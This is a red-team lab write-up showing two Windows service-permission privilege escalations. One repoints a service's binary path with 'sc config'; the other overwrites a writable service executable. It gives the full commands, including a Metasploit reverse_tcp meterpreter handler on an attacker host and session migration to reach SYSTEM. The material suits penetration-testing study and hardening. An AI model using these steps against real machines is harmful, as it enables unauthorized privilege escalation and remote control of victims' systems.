Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
T1134: Primary Access Token Manipulation
Windows NamedPipes 101 + Privilege Escalation
T1038: DLL Hijacking
T1108: WebShells
T1183: Image File Execution Options Injection
Unquoted Service Paths
Pass The Hash: Privilege Escalation with Invoke-WMIExec
Environment Variable $Path Interception
Weak Service Permissions
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Weak Service Permissions

This quick lab covers two Windows service misconfigurations that allow an attacker to elevate their privileges:

  1. A low privileged user is allowed to change service configuration - for example change the service binary the service launches when it starts

  2. A low privileged user can overwrite the binary the service launches when it starts

1. Changing Service Configuration

Let's enumerate services with accesschk from SysInternals and look for SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG as these privileges allow attackers to modify service configuration:

attacker@victim
\\vboxsvr\tools\accesschk.exe /accepteula -ucv "mantvydas" evilsvc
or
\\vboxsvr\tools\accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Below indicates that the user mantvydas has full access to the service:

Let's modify the service and point its binary to our malicious binary that will get us a meterpreter shell when the service is launched:

attacker@victim
.\sc.exe config evilsvc binpath= "c:\program.exe"

Let's fire up a multihandler in mfsconsole:

attacker@kali
msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit"

...and start the vulnerable service:

attacker@victim
.\sc.exe start evilsvc

..and enjoy the meterpreter session:

Note that the meterpreter session will die soon since the meterpreter binary program.exe that the vulnerable service VulnSvc kicked off, is not a compatible service binary. To save the session, migrate it to another sprocess:

attacker@kali
run post/windows/manage/migrate

Even though the service failed, the session was migrated and saved:

2. Overwriting Service Binary

From the first exercise, we know that our user has SERVICE_ALL_ACCESS for the service evilsvc. Let's check the service binary path:

attacker@victim
sc.exe qc evilsvc

Let's check file permissions of the binary c:\service.exe using a native windows tool icals and look for (M)odify or (F)ull permissions for Authenticated Users or the user you currently have a shell with:

attacker@victim
icacls C:\service.exe

Since c:\service.exe is (M)odifiable by any authenticated user, we can move our malicious binary c:\program.exe to c:\service.exe:

attacker@victim
cp C:\program.exe C:\service.exe
ls c:\

...and get the meterpreter shell once sc start evilsvc is executed. Note that the shell will die if we do not migrate the process same way as mentioned earlier:

Since services usually run under NT AUTHORITY\SYSTEM, our malicious binary gets executed with SYSTEM privileges:

Previous
Environment Variable $Path Interception
Next - offensive security
Credential Access & Dumping
Last updated 1 year ago
Contents
1. Changing Service Configuration
2. Overwriting Service Binary